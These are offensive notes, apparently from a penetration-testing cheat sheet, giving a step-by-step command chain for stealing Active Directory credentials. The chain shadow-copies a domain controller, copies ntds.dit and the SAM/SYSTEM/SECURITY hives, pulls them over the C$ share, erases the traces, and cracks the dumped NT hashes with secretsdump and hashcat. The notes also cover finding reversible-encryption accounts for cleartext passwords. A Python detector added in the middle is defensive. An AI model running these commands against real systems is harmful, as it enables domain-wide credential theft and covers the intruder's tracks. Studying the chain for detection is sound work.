Windows NT Directory Services

Create Shadow

Locate diskshadow.exe:
cmd /c where /R C:\ diskshadow.exe
Create a shadow copy of C: and expose it as W: through a diskshadow script:
cd \Windows\Temp
powershell -c "Add-Content add_vol.txt 'set context persistent nowriters'"
powershell -c "Add-Content add_vol.txt 'set metadata C:\Windows\Temp\meta.cab'"
powershell -c "Add-Content add_vol.txt 'set verbose on'"
powershell -c "Add-Content add_vol.txt 'begin backup'"
powershell -c "Add-Content add_vol.txt 'add volume c: alias DCROOT'"
powershell -c "Add-Content add_vol.txt 'create'"
powershell -c "Add-Content add_vol.txt 'expose %DCROOT% w:'"
powershell -c "Add-Content add_vol.txt 'end backup'"
cmd /c diskshadow.exe /s add_vol.txt
Resulting add_vol.txt:
set context persistent nowriters
set metadata C:\Windows\Temp\meta.cab
set verbose on
begin backup
add volume c: alias DCROOT
create
expose %DCROOT% w:
end backup

Exfiltrate over SMB

Create a network share with anonymous access or, as in the commands below, simply stage the files in C:\Windows\Temp and pull them later through the C$ admin share:
cd \Windows\Temp
copy w:\Windows\NTDS\ntds.dit ntds.dit
cmd /c reg.exe save hklm\system system.hive
cmd /c reg.exe save hklm\sam sam.hive
cmd /c reg.exe save hklm\security security.hive
Connect to the share with impacket's smbclient.py and grab the files:
$ smbclient.py MEGACORP/administrator:'Passw0rd!'@
use C$
cd windows/temp
get ntds.dit
get system.hive
get sam.hive
get security.hive

Clean Up

Unexpose and delete the shadow copy:
cd \Windows\Temp
powershell -c "Add-Content delete_vol.txt 'set context persistent nowriters'"
powershell -c "Add-Content delete_vol.txt 'set metadata C:\Windows\Temp\meta.cab'"
powershell -c "Add-Content delete_vol.txt 'set verbose on'"
powershell -c "Add-Content delete_vol.txt 'unexpose w:'"
powershell -c "Add-Content delete_vol.txt 'delete shadows volume c:'"
powershell -c "Add-Content delete_vol.txt 'reset'"
cmd /c diskshadow.exe /s delete_vol.txt
Resulting delete_vol.txt:
set context persistent nowriters
set metadata C:\Windows\Temp\meta.cab
set verbose on
unexpose w:
delete shadows volume c:
reset
Remove the share, if one was created, and all other traces (staged files, metadata cab, diskshadow scripts):
cd \Windows\Temp
rm ntds.dit
rm system.hive
rm sam.hive
rm security.hive
rm C:\Windows\Temp\meta.cab
rm add_vol.txt
rm delete_vol.txt
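
Every step above, from the scripted diskshadow run through the hive exports and the copy of ntds.dit out of the exposed shadow, is a process creation a defender can log. As an added example (not part of the original notes), the Python below tags such command lines and raises a per-host alert when a scripted diskshadow run is followed by a SYSTEM hive export; the 30-minute window and the sample 4688/Sysmon-style events are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Command-line patterns taken from the chain on this page (case-insensitive).
DISKSHADOW_SCRIPT = re.compile(r"diskshadow(\.exe)?\s+.*[/-]s\b", re.I)   # diskshadow /s <script>
REG_SAVE_HIVE = re.compile(r"reg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.I)
NTDS_COPY = re.compile(r"\\windows\\ntds\\ntds\.dit", re.I)                # copy out of an exposed shadow
WINDOW = timedelta(minutes=30)  # assumed correlation window

def classify(cmdline):
    """Tag a single process command line, or return None if it is uninteresting."""
    if DISKSHADOW_SCRIPT.search(cmdline):
        return "vss_script"
    m = REG_SAVE_HIVE.search(cmdline)
    if m:
        return "hive_" + m.group(2).lower()
    if NTDS_COPY.search(cmdline):
        return "ntds_copy"
    return None

def correlate(events):
    """Per host, alert when a scripted diskshadow run is followed within WINDOW by a SYSTEM
    hive export (the shadow yields ntds.dit, SYSTEM holds the boot key to decrypt it)."""
    by_host = defaultdict(list)
    for ev in events:
        tag = classify(ev["cmdline"])
        if tag:
            by_host[ev["host"]].append((ev["ts"], tag))
    alerts = []
    for host, hits in by_host.items():
        hits.sort()
        for i, (t0, tag0) in enumerate(hits):
            if tag0 != "vss_script":
                continue
            tags = {tag for t, tag in hits[i:] if t - t0 <= WINDOW}
            if "hive_system" in tags:
                alerts.append({"host": host, "first_seen": t0, "tags": sorted(tags)})
                break
    return alerts

# Constructed sample events (not real telemetry): DC01 mirrors this page, FS02 runs diskshadow for a legitimate backup.
SAMPLE_EVENTS = [
    {"host": "DC01", "ts": datetime(2024, 5, 1, 2, 10), "cmdline": "diskshadow.exe /s add_vol.txt"},
    {"host": "DC01", "ts": datetime(2024, 5, 1, 2, 12), "cmdline": r"cmd /c copy w:\Windows\NTDS\ntds.dit ntds.dit"},
    {"host": "DC01", "ts": datetime(2024, 5, 1, 2, 13), "cmdline": r"reg.exe save hklm\system system.hive"},
    {"host": "DC01", "ts": datetime(2024, 5, 1, 2, 14), "cmdline": r"reg.exe save hklm\sam sam.hive"},
    {"host": "FS02", "ts": datetime(2024, 5, 1, 3, 0), "cmdline": "diskshadow.exe /s nightly.txt"},
    {"host": "FS02", "ts": datetime(2024, 5, 1, 3, 1), "cmdline": r"reg.exe save hklm\software sw.hive"},
]
```

Calling correlate(SAMPLE_EVENTS) returns one alert for DC01 and none for FS02, whose diskshadow run is never paired with a credential hive export.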

Parse offline with impacket's secretsdump.py (optional flags in brackets), then filter to enabled accounts with an empty LM hash (aad3b...), drop empty NT hashes (31d6c...), machine accounts ($) and Exchange system mailboxes, keep user:nthash, and feed the result to hashcat:
$ secretsdump.py [-pwd-last-set] [-user-status] [-history] -sam sam.hive -system system.hive -security security.hive -ntds ntds.dit LOCAL > ntds.txt
$ grep -a aad3b ntds.txt | grep -i 'Status=Enabled' | grep -v 31d6c | grep -v -e '\$' -e '{' -e '}' -e HealthMailbox | awk -F: '{print $1":"$4}' | sort -u > ntds.in
$ hashcat -m 1000 -a 0 -w 4 -O --session=ntds -o ntds.out ntds.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule
Parse with aesedb's antdsparse (faster but less informative), passing either the boot key or the SYSTEM hive:
$ antdsparse <BOOTKEY> ntds.dit -o ntds.txt --progress
$ antdsparse system.hive ntds.dit -o ntds.txt --progress

Reversible Encryption

Check if enabled globally:
  • gpmc.msc > Default Domain Policy > Computer Configuration > Policies > Windows Settings > Security Settings > Account Policies > Password Policy > Store passwords using reversible encryption > Enabled
Check if enabled for specific users (userAccountControl bit 128 = ENCRYPTED_TEXT_PWD_ALLOWED):
PS > Get-ADUser -Filter {userAccountControl -band 128} -Properties userAccountControl | ft name,samAccountName,userAccountControl | tee users-revenc.txt
When DCSyncing such users, a cleartext password will be obtained.